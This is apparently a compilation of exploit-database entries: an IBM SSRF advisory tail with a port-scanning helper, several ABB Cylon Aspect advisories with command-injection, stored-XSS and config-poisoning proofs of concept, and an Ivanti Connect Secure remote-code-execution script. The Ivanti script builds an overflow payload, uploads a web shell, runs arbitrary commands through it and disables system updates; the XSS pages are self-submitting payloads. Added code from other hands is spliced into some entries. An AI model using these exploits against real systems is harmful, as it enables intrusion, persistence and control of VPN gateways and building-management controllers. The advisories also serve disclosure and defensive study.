outside of the LAN. This can be abused for port scans, information disclosure, data exfiltration, bypassing firewall rules to attack non-managed nodes,
or connecting to attacker-controlled C2 infrastructure.

This SSRF relies on the HTTP security token bypass CVE-2024-51464: the MN token of an intercepted HTTP request is incremented or padded with zeros,
the attacker-controlled MN token is then treated as valid, and the HTTP 403 Forbidden restriction is bypassed.


[Exploit/POC]
1)  attacker payload

POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4
{"hostname":"10.2.10.16", "port":445}

2) attackers c2 server

┌──(rootggKali)-[/usr/share]
└─# nc -llvp 445                                                       
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569


For port scanning, whether a port on the external host is open or closed can be inferred from the error responses:

Port is open:
Error 500: Connection reset

Port is closed
Error 500: A remote host refused an attempted connect 
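As an added example, not part of the advisory, the following Python code assembles the testPortConnection request shown above and classifies responses using the two error strings the advisory reports as the open/closed oracle. The Mn: value is assumed to have been forged already per CVE-2024-51464 and is passed in by the caller; the sample responses are constructed, and nothing is sent on the network.

```python
import json

# Oracle strings quoted in the advisory; matched as substrings of the error body.
OPEN_MARKER = "Connection reset"
CLOSED_MARKER = "refused an attempted connect"

# Constructed sample responses as (port, status, body); not captured traffic.
SAMPLE_RESPONSES = [
    (445, 500, "Error 500: Connection reset"),
    (3389, 500, "Error 500: A remote host refused an attempted connect"),
    (9476, 200, ""),
    (22, 403, "Error 403: SRVE38895F: Error reported: 403"),
]


def build_port_probe(system: str, hostname: str, port: int, mn_token: str) -> dict:
    """Assemble the testPortConnection request from the advisory.

    Returns method, path, headers and JSON body; the session cookie and a
    forged Mn: value are the caller's responsibility. Nothing is sent.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return {
        "method": "POST",
        "path": f"/Navigator/DispatcherServlet/serviceability/testPortConnection?system={system}",
        "headers": {"Mn": mn_token, "Content-Type": "application/json"},
        "body": json.dumps({"hostname": hostname, "port": port}),
    }


def classify_response(status: int, body: str) -> str:
    """Map a response to open/closed/forbidden/unknown using the advisory's strings."""
    if status == 403:
        return "forbidden"      # Mn: token not accepted: the bypass did not work
    if status == 500:
        if OPEN_MARKER in body:
            return "open"
        if CLOSED_MARKER in body:
            return "closed"
    return "unknown"            # no oracle string; do not guess


def scan(responses) -> dict:
    """Turn an iterable of (port, status, body) into {port: state}."""
    return {port: classify_response(status, body) for port, status, body in responses}


if __name__ == "__main__":
    probe = build_port_probe("10.1.1.4", "10.2.10.16", 445, "6844795211300000000")
    print(probe["method"], probe["path"])
    print(probe["body"])
    for port, state in scan(SAMPLE_RESPONSES).items():
        print(f"{port}: {state}")
```

A 403 is reported separately from a closed port: it means the forged Mn: value was rejected, so the scan result for that port says nothing about the target host.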


[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509

[Affected versions]
7.5.0,7.4.0, 7.3.0


[Network Access]
Remote


[Severity]
Medium
CVSS Base score:  5.4

[Disclosure Timeline]
Vendor Notification:  10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
OS command injection vulnerability. This can be exploited to inject and execute
arbitrary shell commands through the contents of an uploaded .db file, which
is passed to the copyFile.sh script. Although the filename is sanitized, the
contents of the .db file are not, allowing attackers to inject malicious commands
that are executed on the server.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5904
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
CVE ID: CVE-2024-48839
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl -s http://192.168.73.31/uploadDb.php \
> -H "Cookie: PHPSESSID=xxx" \
> -F "userfile=@testingus.db"

$ curl http://192.168.73.31/database/testingus.db
            
ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
stored cross-site scripting (XSS) vulnerability. This can be exploited by
uploading a malicious .txt file containing an XSS payload, which is stored
on the server and served back to users. Although the filename is sanitized
via the filename POST parameter, the file contents are not inspected or
sanitized, allowing attackers to inject arbitrary client-side scripts that
execute in the context of any user accessing the infected file or the related
web page (license.php). To pass the upload checks, the file contents must
include the Variant string (as in the PoC below), which lets the upload proceed.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5905
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
CVE ID: CVE-2024-6516
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516


21.04.2024

-->



                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

<html>
  <body>
    <script>
      function storeit()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
        xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + 
          "Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" + 
          "Content-Type: text/lic\r\n" + 
          "\r\n" + 
          "Variant = AspectMAX\r\n" + 
          "\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" + 
          "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      storeit();
    </script>
    <form action="#">
      <input type="button" value="Post" onclick="storeit();" />
    </form>
  </body>
</html>
            
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site
scripting vulnerability. Input passed to the 'host' POST parameter is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML/JS code in a user's browser session in context of
an affected site.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5906
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php
CVE ID: CVE-2024-6516
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516


21.04.2024

-->



                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

<html>
<body>
  <form action="http://192.168.73.31/licenseServerUpdate.php" method="post">
    <input type="hidden" name="licenseServer" value="Server" />
    <input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" />
    <input type="submit" value="Submit" />
  </form>
</body>
</html>
            
# Exploit Title: Ivanti Connect Secure 22.7R2.5  - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        # Sending the command via POST
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")


def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    # Upload the web shell
    upload_web_shell(target_ip, local_shell_path)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()
            
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from improper input validation on
the port POST parameter in the webServerUpdate.php script. This input is not
validated on the server side and relies on bypassable client-side checks using
the inString.js script to verify that the port parameter contains only characters
from the set (0123456789). Attackers can bypass these checks and supply arbitrary
integer values. Exploitation of this issue can result in configuration poisoning,
Denial of Service (DoS) through malformed configurations, or manipulation of
server settings via Cross-Site Request Forgery (CSRF) combined with authentication
bypass.
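Server-side handling of the port parameter, written here in PHP to match the affected script; this is an added example, not ABB's code or part of the advisory, and `apply_web_server_port()` and the `$_SESSION['csrf_token']` name are assumptions. It rejects the overlong all-digit value used in the PoC below, which passes the inString.js digit filter, and the forged cross-site POST the description mentions.

```php
<?php
declare(strict_types=1);

// Added example, not ABB's code: the checks webServerUpdate.php must perform
// itself instead of trusting the digit filter in inString.js.
// Assumptions: the CSRF token is kept in $_SESSION['csrf_token'] and
// apply_web_server_port() is a hypothetical helper that writes the setting.

session_start();

/**
 * Returns the port as an int in 1..65535, or null if the value is unacceptable.
 * A "digits only" test is not sufficient: a value such as 9999...9 is all
 * digits but is not a TCP port, and (int) casting it silently saturates.
 */
function validate_port(string $raw): ?int
{
    // Plain decimal integer only: no sign, whitespace, leading zeros or float
    // notation, and at most five digits, which bounds the length early.
    if (preg_match('/^(0|[1-9][0-9]{0,4})$/', $raw) !== 1) {
        return null;
    }
    $port = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 65535],
    ]);
    return $port === false ? null : $port;
}

/** Constant-time comparison of the submitted CSRF token with the session copy. */
function csrf_token_valid(?string $submitted, ?string $expected): bool
{
    return is_string($submitted) && is_string($expected)
        && $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}
// Rejects the forged cross-site POST described in the advisory.
if (!csrf_token_valid($_POST['csrf_token'] ?? null, $_SESSION['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid request token.');
}
$raw  = $_POST['port'] ?? null;              // may be absent or an array
$port = is_string($raw) ? validate_port($raw) : null;
if ($port === null) {
    http_response_code(400);
    exit('Port must be an integer between 1 and 65535.');
}
apply_web_server_port($port);                // only the validated int reaches the config
echo 'Web Server settings have been updated; the server now listens on port ' . $port . '.';
```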

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░


$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
    <title>The ABB Group</title>
    <link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
    <tr>
        <td width="100%" valign="top">
                        Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue.        </td>
    </tr>
</table>
<iframe src="webServerUpdateRun.php" style="visibility:hidden;">
</iframe>
</body>
</html>